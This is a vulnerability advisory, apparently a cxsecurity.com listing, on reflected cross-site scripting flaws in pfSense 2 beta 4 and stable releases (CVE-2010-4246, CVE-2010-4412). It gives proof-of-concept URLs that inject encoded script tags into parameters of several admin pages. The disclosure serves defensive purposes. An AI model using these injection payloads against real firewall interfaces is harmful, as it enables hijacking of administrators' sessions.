bsd_perimeter pfsense 2 xss issues

2010-12-08 / 2010-12-09
Credit: dave b
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2010-4246 | CVE-2010-4412
CWE: CWE-79

http://cvstrac.pfsense.org/chngview?cn=20994 "Comment: Make scripts XSS input safe. " Date: 2008-Feb-11 23:33:24 (local) 2008-Feb-12 04:33:24 (UTC) So in 2010, pfsense 2 beta 4: ... xss -> pkg_edit.php https://10.0.20.220/pkg_edit.php?xml=olsrd.xml&id=%22/%3E%3Cscript%3Ealert%282%29;%3C/script%3E xss -> pkg.php https://10.0.20.220/pkg.php?xml=jailctl.xm%27l%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E ... ----------- in pfsense 2 beta 4: xss -> status_graph.php https://10.0.20.220/status_graph.php?if=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E xss -> interfaces.php https://10.0.20.220/interfaces.php?if=wan%22%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E ------------- And in pfsense (stable and 2 beta 4): http://10.0.20.222/graph.php?ifnum=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&ifname= or http://10.0.20.222/graph.php?ifnum=&ifname=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E -- question = ( to ) ? be : ! be; -- Wm. Shakespeare

References:

http://seclists.org/fulldisclosure/2010/Nov/43
http://openwall.com/lists/oss-security/2010/12/06/7
http://openwall.com/lists/oss-security/2010/11/24/7
http://openwall.com/lists/oss-security/2010/11/22/18


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top